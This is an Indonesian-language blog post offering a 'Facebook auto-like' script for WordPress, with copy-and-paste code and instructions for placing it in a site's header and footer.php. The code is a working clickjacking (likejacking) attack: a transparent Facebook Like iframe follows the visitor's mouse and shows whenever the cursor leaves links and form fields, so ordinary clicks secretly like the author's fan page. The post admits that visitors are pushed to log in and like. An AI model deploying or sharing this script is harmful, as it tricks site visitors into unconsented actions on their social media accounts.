Script Auto Like Facebook Untuk Wordpress

Jadilah manusia yang bermanfaat. Teruslah berbagi, Apa yang kamu beri bagi mereka mungkin sangat berarti.
ok langsung aja, ane kagak pandai basa basi.. he he he maaf kalo repost ato salah kandang...
Script Auto Like Facebook Untuk Wordpress

ni script dah lolos uji emisi page engin WP ,pake blogcepot bisa aja sih tapo blm ane coba, perlu dioprek dikit lagi keknya...

tareuh ni script sebelum </head>
<script type="text/javascript">            function ClickJackFbHide(){                jQuery("div[id^=\'clickjack-button-wrapper\']").hide();            }            function ClickJackFbShow(){                jQuery("div[id^=\'clickjack-button-wrapper\']").show();            }        </script>

belum slesei, lalu cari di bagian footer.php cari </body> nah taruh skrip ni di sebelumnya

<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> <!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>--><iframe src="http://www.facebook.com/plugins/like.php?href=(ganti ama id fanspage mas bro ex:hssp://www.facebook.com/pages/carcom/252533878)&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>     </div>     <script type="text/javascript">         jQuery( document ).ready( function() {             $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {                jQuery( "#clickjack-button-wrapper-5" ).css( {                    top: e.pageY - 10,                    left: e.pageX + 30                } );            } );                        clickjack_hider();                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);        } );                        function clickjack_hider(){            jQuery("input").mouseout(function(){ClickJackFbShow();});            jQuery("a").mouseout(function(){ClickJackFbShow();});            jQuery("button").mouseout(function(){ClickJackFbShow();});            jQuery("textarea").mouseout(function(){ClickJackFbShow();});            jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});            jQuery("object").mouseout(function(){ClickJackFbShow();});            jQuery("input").mouseover(function(){ClickJackFbHide();});            jQuery("a").mouseover(function(){ClickJackFbHide();});            jQuery("button").mouseover(function(){ClickJackFbHide();});            jQuery("textarea").mouseover(function(){ClickJackFbHide();});            jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});            jQuery("object").mouseover(function(){ClickJackFbHide();});                        }    </script>


Update NB: coba cek di header udah ada script

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>

,kadang kagak semuanya nggunain, kalo belom ada, paste aja sebelum </head>

yang warna merah jangan lupa diganti ya... kok malah banyak merahnya ya, yaudahlah, efek php script keknya, pokoknya cari ini "(ganti ama id fanspage mas bro ex:hssp://www.facebook.com/pages/carcom/252533878)"
ok segitu aja coba dites dolo,

kalau menurut ane ni kurang ajib, soalnya yg ndak login fb bakal dipaksa login ampe kriting n musti ngelike buat yg mau copas artikel blognya...

tapi ndak usah kawatir, buat yg udah like ga bakalan dislike kok kalo ngunjungi balik...

Advertiser

Artikel terkait : Script Auto Like Facebook Untuk Wordpress
Share this with short URL:
 
Tools Perampok